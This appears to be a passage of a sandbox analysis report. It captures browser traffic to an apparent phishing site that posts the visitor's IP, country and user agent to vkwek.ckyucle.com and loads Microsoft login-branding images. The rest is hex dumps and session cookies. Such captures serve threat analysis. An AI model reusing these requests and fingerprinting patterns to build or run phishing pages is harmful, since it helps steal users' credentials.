                                                              2024-07-03 07:41:11 UTC1369INData Raw: dc 9e 78 42 ec 64 45 7e e4 fd 3b 70 2e 5c 04 2d 82 bb d0 77 d9 f2 21 2e 96 de a6 27 0b f2 64 4b be c1 1d 63 00 00 20 00 49 44 41 54 c3 da 45 e9 6a fa 32 25 bf 1f 9a 93 f1 7d 54 74 22 3d 61 2e fe e3 f7 d5 cc 2b e7 06 a1 b2 b7 53 8e ea 13 72 3f 76 ee 39 25 79 59 82 27 39 ed 7f 1b 56 03 d5 7d e5 4f e1 53 06 0b 52 27 c5 a6 19 2c 6c cb f0 16 83 8c e8 95 43 be 7f 19 2f 8c a9 e8 03 de 80 57 ae 5b 8d 6b 7d 4a 4d c5 8c eb 37 b0 ee c1 43 8d 65 19 92 00 46 f4 86 e4 2d 61 ea 6a 68 d7 ba c6 28 ce 98 39 93 5b bf 6e 1d 95 d3 b5 5b 37 8c 19 3d 5a 67 18 bc 8b 7b cf 05 35 6c 00 72 e6 3c 29 ed bb f6 c9 b4 5a 3e 23 f3 1d 49 6d 4b 66 fd 55 fd ea 64 b2 99 90 3b 21 79 42 f6 19 c5 b3 68 3e 9a f4 a6 59 60 ce f9 f0 09 c9 ff 3a fb 1c 4e 5d 7c 01 bb bc 79 30 7f 62 dd 6c 89 fe cb d7
                                                              Data Ascii: xBdE~;p.\-w!.'dKc IDATEj2%}Tt"=a.+Sr?v9%yY'9V}OSR',lC/W[k}JM7CeF-ajh(9[n[7=Zg{5lr<)Z>#ImKfUd;!yBh>Y`:N]|y0bl
                                                              2024-07-03 07:41:11 UTC1369INData Raw: c7 9c 11 7d e6 2b 8a e4 b1 ff bd aa 6a a7 09 2a ba 2e 23 9f 45 e1 c6 5d c9 a9 8f ca 16 87 02 f9 50 a7 6a 05 65 ab ab 54 6f f0 d9 73 d8 f7 4c bc cf ea 19 d1 ab 14 0e ac 72 16 08 68 7d f0 15 02 ea c3 47 8c e0 0e 1f 3a 44 55 19 32 74 28 7e ea df 5f 10 76 4f 9e 3c 85 db b2 65 73 26 88 6a d4 a8 49 09 be b6 bf 72 2b d3 3f 7d 7a cf 99 25 1e 42 ae d4 17 42 80 5b aa c3 37 53 07 a4 58 37 84 95 4d f6 3f 54 f8 54 98 11 7d 66 34 ff a9 53 1b 81 3c 9f 48 77 ec c2 75 bc 8f 97 1c 64 a4 4a 69 56 af 3a 2c f2 28 b7 05 54 15 b9 db 1f 3f c1 88 0b f2 c7 30 ab d2 5e e8 75 19 d1 0b dd 43 c2 d7 4f 10 84 a7 4d 98 5e 45 c7 d0 bd f3 a4 90 15 ed 24 13 5e a9 12 da 9f 5d 2a 63 d3 f5 f0 9b f4 59 7d c6 e1 3a 4e ce ce 74 a1 5d f7 6e 5d d5 f2 cb d7 b8 63 5c ee 2f d7 94 e9 5a eb 75 d2 cc cb
                                                              Data Ascii: }+j*.#E]PjeTosLrh}G:DU2t(~_vO<es&jIr+?}z%BB[7SX7M?TT}f4S<HwudJiV:,(T?0^uCOM^E$^]*cY}:Nt]n]c\/Zu
                                                              2024-07-03 07:41:11 UTC709INData Raw: 67 5f a2 23 c0 43 87 8f 70 23 86 ff 8f 7a cb c7 c7 07 1b 36 6c 10 9d 8d e2 0c 45 cd ad 62 44 ff 1d c3 b5 01 f5 50 db d9 49 73 50 73 90 f0 31 e9 33 0e 9f 21 49 99 b2 2f e4 b9 3c 79 3e af 8b b2 e7 e9 33 0c 3d 77 5e 17 5d e9 b4 0f 46 f4 3a 85 5b 94 9d 89 8e 04 07 0c 1c c8 9d 3e 75 8a 3a eb 7f c3 47 a0 4f ef 5e a2 b3 51 94 91 c8 83 51 8c e8 bf 83 f8 b7 7f 2d 34 76 d3 ce e2 37 92 06 37 2a e6 1d 9e be 8c c6 e7 af c9 0a 3d e7 e6 52 88 e6 b8 77 b2 cf 4f cf 9b d0 56 21 e7 d2 93 f3 e9 c5 56 18 d1 8b cd a3 ba b7 47 54 24 f8 22 ea 15 d7 a8 61 03 8a a2 85 85 05 5d 84 e7 51 ac a8 a8 6c d4 7d 88 18 4e 8f 8c e8 bf fb 6a 4a 95 ca e8 56 92 bf 74 b3 64 85 fd a3 17 af f0 e8 d9 2b 24 a9 70 0e bd 6c f4 98 9a e6 42 11 27 07 78 79 ba c3 da d2 82 f7 c0 5a 74 3b 02 7f 84 df e4 5d
                                                              Data Ascii: g_#Cp#z6lEbDPIsPs13!I/<y>3=w^]F:[>u:GO^QQ-4v77*=RwOV!VGT$"a]Ql}NjJVtd+$plB'xyZt;]
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e
                                                              Data Ascii: |FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              87192.168.2.662972188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:12 UTC1545OUTPOST /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              Content-Length: 236
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Accept: */*
                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                              X-Requested-With: XMLHttpRequest
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:12 UTC236OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 64 50 48 39 4d 68 6f 34 45 64 4b 43 62 4b 77 33 70 42 36 34 32 67 25 33 44 25 33 44 26 74 79 70 65 3d 33 26 74 79 70 65 76 61 6c 3d 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 63 6f 75 6e 74 72 79 3d 55 6e 69 74 65 64 2b 53 74 61 74 65 73 26 75 73 65 72 61 67 65 6e 74 3d 4d 6f 7a 69 6c 6c 61 25 32 46 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 25 33 42 2b 57 69 6e 36 34 25 33 42 2b 78 36 34 29 2b 41 70 70 6c 65 57 65 62 4b 69 74 25 32 46 35 33 37 2e 33 36 2b 28 4b 48 54 4d 4c 25 32 43 2b 6c 69 6b 65 2b 47 65 63 6b 6f 29 2b 43 68 72 6f 6d 65 25 32 46 31 31 37 2e 30 2e 30 2e 30 2b 53 61 66 61 72 69 25 32 46 35 33 37 2e 33 36 26 61 70 70 6e 75 6d 3d 31
                                                              Data Ascii: pagelink=dPH9Mho4EdKCbKw3pB642g%3D%3D&type=3&typeval=0&ip=8.46.123.33&country=United+States&useragent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F117.0.0.0+Safari%2F537.36&appnum=1
                                                              2024-07-03 07:41:12 UTC1003INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1AvSlqf6zWv87qZMl3T%2F%2B8lwliYfX75bvtpfsf4Egh8ZgSWMIQksBBaw63k5CBRoWBARIcxECHsFDU3kViw7a48AZbUKhdNkKZRMxJialnkpgmxglVAoD9QG8OdAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:12 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:12 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 4a 68 64 6c 68 31 61 6e 70 6d 4e 57 4e 32 65 54 46 61 56 58 4a 58 59 6a 4a 76 56 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6b 74 44 55 6e 4a 4b 51 57 59 31 65 6d 64 34 59 58 46 57 53 44 64 79 4d 6c 4e 7a 4e 6e 51 31 59 79 74 47 61 32 70 6b 5a 58 4d 34 56 30 5a 57 64 30 6c 72 64 7a 5a 6f 61 33 70 6d 57 57 46 52 56 55 5a 53 4d 6c 46 56 65 58 42 6a 4b 79 74 49 63 58 52 32 4d 48 5a 6f 59 30 64 72 4b 32 39 72 65 6c 42 52 4e 46 4e 4b 57 56 59 34 51 54 68 5a 65 6e 4e 68 62 32 46 77 64 58 4a 77 4d 6c 4a 78 55 7a 6c 61 61 46 56 6b 55 6d 6c 43 63 47 4e 57 62 43 39 74 63 6e 6c 4f 61 6a 56 79 64 48 4d 34 53 30 4a 4a 51 6b 6b 35 5a 46 6b
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFk
                                                              2024-07-03 07:41:12 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                              Data Ascii: 11
                                                              2024-07-03 07:41:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              88192.168.2.662971104.21.90.1674434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:12 UTC424OUTGET /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1
                                                              Host: s3irk.ativens.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:12 UTC607INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:41:12 GMT
                                                              Content-Type: application/json; charset=utf-8
                                                              Content-Length: 155
                                                              Connection: close
                                                              vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b593c4fc411-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:41:12 UTC155INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 52 6f 75 74 65 20 47 45 54 3a 2f 52 59 62 65 54 46 69 57 6a 44 5a 67 4a 4a 4a 70 4c 50 6e 6c 6e 45 4c 67 4a 41 44 70 51 57 5a 54 55 4b 4d 49 56 52 53 58 56 4d 4c 45 52 45 58 56 4e 50 46 58 4d 43 43 4a 4f 51 4b 49 56 70 71 34 4b 74 6b 4a 59 33 74 79 7a 79 78 44 7a 71 65 75 76 34 30 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 7d
                                                              Data Ascii: {"message":"Route GET:/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 not found","error":"Not Found","statusCode":404}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              89192.168.2.662974152.199.21.1754434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:12 UTC693OUTGET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1
                                                              Host: aadcdn.msauthimages.net
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:13 UTC619INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                              Age: 69858
                                                              Cache-Control: public, max-age=86400
                                                              Content-MD5: qdmxqkY5dM+rfCJTVThS8Q==
                                                              Content-Type: image/*
                                                              Date: Wed, 03 Jul 2024 07:41:12 GMT
                                                              Etag: 0x8D81E658CA6B7D6
                                                              Last-Modified: Thu, 02 Jul 2020 08:54:37 GMT
                                                              Server: ECAcc (lhc/7916)
                                                              X-Cache: HIT
                                                              x-ms-blob-type: BlockBlob
                                                              x-ms-lease-status: unlocked
                                                              x-ms-request-id: b7fea571-a01e-002b-8079-cc588a000000
                                                              x-ms-version: 2009-09-19
                                                              Content-Length: 290799
                                                              Connection: close
                                                              2024-07-03 07:41:13 UTC16383INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 12 a6 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 fb 0d 00 00 01 01 03 00 01 00 00 00 c3 07 00 00 02 01 03 00 05 00 00 00 b6 00 00 00 03 01 03 00 01 00 00 00 05 00 00 00 06 01 03 00 01 00 00 00 05 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 05 00 00 00 1a 01 05 00 01 00 00 00 c0 00 00 00 1b 01 05 00 01 00 00 00 c8 00 00 00 1c 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1c 00 00 00 d0 00 00 00 32 01 02 00 14 00 00 00 ec 00 00 00 69 87 04 00 01 00 00 00 00 01 00 00 2c 01 00 00 08 00 08 00 08 00 08 00 08 00 2c 01 00 00 01 00 00 00 2c 01 00 00 01 00 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43
                                                              Data Ascii: JFIF,,ExifII*(12i,,,Adobe Photoshop C
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 6f 2f 7a 2f 41 50 7a 46 4b 31 55 6a 36 69 35 31 4f 48 52 73 63 38 54 6b 4e 42 2b 7a 74 46 6f 49 49 64 6f 36 57 47 47 2b 26 23 78 41 3b 4a 51 4b 55 58 53 4c 78 5a 68 75 66 61 31 31 6a 6d 76 49 6e 4b 59 32 6d 77 36 4e 4f 6a 51 78 6f 6a 58 6c 4a 54 66 71 74 71 64 59 77 4e 72 72 61 58 44 64 49 49 6b 65 58 30 65 55 61 52 62 6a 76 79 62 42 31 66 59 35 32 51 57 65 75 26 23 78 41 3b 35 70 61 36 6c 6f 71 6a 54 6d 7a 30 35 32 2b 63 6f 4a 64 43 33 45 78 72 62 48 50 63 33 47 68 77 69 4e 4a 48 6e 4f 31 45 47 6b 45 49 2b 6f 4e 62 6a 39 4e 59 4b 70 41 4e 77 4a 2b 7a 4d 62 59 4e 5a 2f 4e 4c 53 41 45 69 56 55 78 36 26 23 78 41 3b 53 31 6a 71 58 32 58 52 5a 75 65 64 6f 79 57 73 71 63 30 44 54 52 72 61 78 6f 68 61 61 62 39 62 63 66 65 33 62 58 51 44 4f 68 61 52 50 79 39 71
                                                              Data Ascii: o/z/APzFK1Uj6i51OHRsc8TkNB+ztFoIIdo6WGG+&#xA;JQKUXSLxZhufa11jmvInKY2mw6NOjQxojXlJTfqtqdYwNrraXDdIIkeX0eUaRbjvybB1fY52QWeu&#xA;5pa6loqjTmz052+coJdC3ExrbHPc3GhwiNJHnO1EGkEI+oNbj9NYKpANwJ+zMbYNZ/NLSAEiVUx6&#xA;S1jqX2XRZuedoyWsqc0DTRraxohaab9bcfe3bXQDOhaRPy9q
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 59 44 58 58 6b 69 35 7a 44 34 79 36 50 75 54 6c 41 32 33 68 59 78 30 6b 4f 6e 75 6b 6c 59 6d 52 79 6b 70 69 43 4f 79 53 48 6e 76 72 44 66 6a 32 75 47 78 38 37 52 46 68 42 45 65 51 6c 54 26 23 78 41 3b 59 2b 55 45 35 58 4a 61 65 63 6c 69 46 52 65 63 66 6e 59 7a 50 61 35 34 44 54 32 4c 67 41 54 38 79 32 65 66 4e 58 49 52 78 34 39 42 51 59 4a 79 79 5a 44 5a 31 59 74 36 7a 68 74 39 6c 62 77 58 6d 49 62 56 37 6a 38 76 54 72 62 2b 26 23 78 41 3b 56 4b 57 57 45 64 79 6f 59 70 4f 6e 67 6e 72 72 4c 47 5a 74 50 54 62 6e 4e 59 64 33 36 52 37 61 79 34 66 31 62 4c 5a 2f 42 55 38 6e 78 44 41 52 77 32 76 6a 68 6b 44 62 31 68 39 51 74 62 61 35 68 59 48 78 6f 59 4d 48 54 32 79 4e 26 23 78 41 3b 4a 55 4d 4a 43 51 73 4d 7a 44 57 50 39 6f 38 30 35 53 35 6d 59 2f 69 50 46 4a
                                                              Data Ascii: YDXXki5zD4y6PuTlA23hYx0kOnuklYmRykpiCOySHnvrDfj2uGx87RFhBEeQlT&#xA;Y+UE5XJaecliFRecfnYzPa54DT2LgAT8y2efNXIRx49BQYJyyZDZ1Yt6zht9lbwXmIbV7j8vTrb+&#xA;VKWWEdyoYpOngnrrLGZtPTbnNYd36R7ay4f1bLZ/BU8nxDARw2vjhkDb1h9Qtba5hYHxoYMHT2yN&#xA;JUMJCQsMzDWP9o805S5mY/iPFJ
                                                              2024-07-03 07:41:13 UTC3INData Raw: 20 20 20
                                                              Data Ascii:
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii:
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 75 e4 80 5c a3 4a 72 48 6b aa 2e 3a d3 55 54 09 a8 4b 64 2b a6 e9 56 c8 11 29 56 9a a6 d6 f6 29 6d 51 74 44 80 f5 46 bc aa 53 01 d5 10 45 68 50 3c 1b 23 54 ca f2 42 b7 f9 d0 3e a8 56 e9 b5 db 5f 14 b9 de e8 1f c5 44 81 35 4d ea 88 aa 22 50 4e fe 74 f6 9e 45 46 da ee 42 70 3c fc e8 89 c1 ea 3a a7 55 41 c5 40 9c d3 57 56 e8 89 c3 86 83 64 f0 e1 b2 af c6 00 34 47 bc a8 d5 05 83 13 9a 8d ee 3d 7c ca 2d f5 42 e6 88 24 0e 3e 9e 69 cd 51 b0 54 ea a5 a5 2c 35 dd 10 89 29 a4 52 f5 df 44 ff 00 04 c8 84 6c 8a 0e a5 13 01 3c 92 07 5a a6 39 d7 35 d1 50 e0 53 9b 7d 93 1a 2b 74 fd 3c 10 36 20 15 ea 80 f2 42 25 de 84 c7 3a 88 01 b9 51 bc d1 38 b8 79 94 6e 35 45 32 ba a5 5a a4 6b 5b a4 06 94 b9 55 29 e0 54 6a 49 4e 02 88 37 c4 23 5a 73 40 6b e6 44 9a 5a b4 4d 2e a8 42 a5
                                                              Data Ascii: u\JrHk.:UTKd+V)V)mQtDFSEhP<#TB>V_D5M"PNtEFBp<:UA@WVd4G=|-B$>iQT,5)RDl<Z95PS}+t<6 B%:Q8yn5E2Zk[U)TjIN7#Zs@kDZM.B
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 24 d0 05 3e 7b c0 e3 e1 50 32 cc 9e 20 d8 7c 4f 9f 63 cb 41 e2 14 2f 70 a1 f4 27 35 ed 19 e3 ed 5e 5b 30 0f 96 0e d5 f6 05 a5 92 81 e1 9f 3c 9e 3c eb 43 b4 b8 50 e0 67 5c 6e 14 06 32 1c 36 4d 3d ad 63 05 03 45 a8 00 59 79 40 b8 09 de 0a 7b f1 52 57 4c 3b e7 8a e5 7f 6d 6c 63 77 91 8b e0 77 5c 0e 0e cf db 2e a7 de d1 7a 06 32 ca e1 f1 2f c4 43 4a e1 30 41 fb 60 db 92 cf 3c ff 00 52 45 e2 bf b6 a4 98 99 8f 86 47 74 48 55 b1 a9 69 d0 ae b3 2e 66 08 73 dc 2f 6b 80 89 a3 9a e3 4e 23 c8 f5 e4 55 6c c9 86 09 88 51 1e c0 03 e9 52 b8 38 7d ec 93 1f 16 0d a2 31 e1 a4 6b 6b ae 19 e1 97 0e 5f d3 a6 19 4e 48 f6 b8 ec 81 3f 2d 15 ae 68 73 4b 68 41 17 1f af eb c9 70 92 22 63 0a 83 06 2c 47 39 f2 af 27 85 e2 b5 84 6a 77 e4 a5 cb 39 95 93 2e 63 63 3f 82 28 6f 0d 4e fd 0f
                                                              Data Ascii: $>{P2 |OcA/p'5^[0<<CPg\n26M=cEYy@{RWL;mlcww\.z2/CJ0A`<REGtHUi.fs/kN#UlQR8}1kk_NH?-hsKhAp"c,G9'jw9.cc?(oN
                                                              2024-07-03 07:41:13 UTC16383INData Raw: 77 ac 15 64 4d 69 b1 59 a4 7a 57 49 31 0b bf 80 e8 74 ad 74 f1 5c f3 d8 5a e7 34 ea 0a ed 85 dc 70 cf 1d 5d 9a 6e 95 2d 74 34 4a a4 d7 92 db 98 38 80 2c 98 eb 8d 93 8f 22 80 d2 c8 a6 d6 94 44 11 ba 6b b5 a9 40 9d 90 d9 c5 d7 40 9a d1 04 74 28 1b e0 92 24 20 89 a2 49 21 a7 ca 92 29 78 23 e2 85 52 37 d5 50 b5 d1 38 0d f6 43 c1 14 12 06 de d5 48 84 99 7b 56 e9 ce 16 e8 88 60 02 db a4 4f 22 89 14 d1 30 d3 65 01 ad 4f 34 b8 b8 74 d1 26 d2 b7 ba 73 af c9 50 d2 78 90 aa 07 53 54 37 ba 28 87 90 7a 20 4d 4d 4a 14 f1 aa 55 d9 13 c1 1b 00 91 bf 44 b5 08 3a ba 6b cd 55 1b 73 42 b4 d4 59 21 d1 24 42 00 f9 ca 20 24 0e d4 48 03 51 5d 10 11 63 cd 3d b4 e2 b5 13 5a 2b a0 29 dc 3b a0 77 0b 49 09 ed f3 51 35 a0 d5 48 19 4f 3a 88 6b 85 46 fe 74 28 79 df 45 60 52 81 31 ed 1a
                                                              Data Ascii: wdMiYzWI1tt\Z4p]n-t4J8,"Dk@@t($ I!)x#R7P8CH{V`O"0eO4t&sPxST7(z MMJUD:kUsBY!$B $HQ]c=Z+);wIQ5HO:kFt(yE`R1
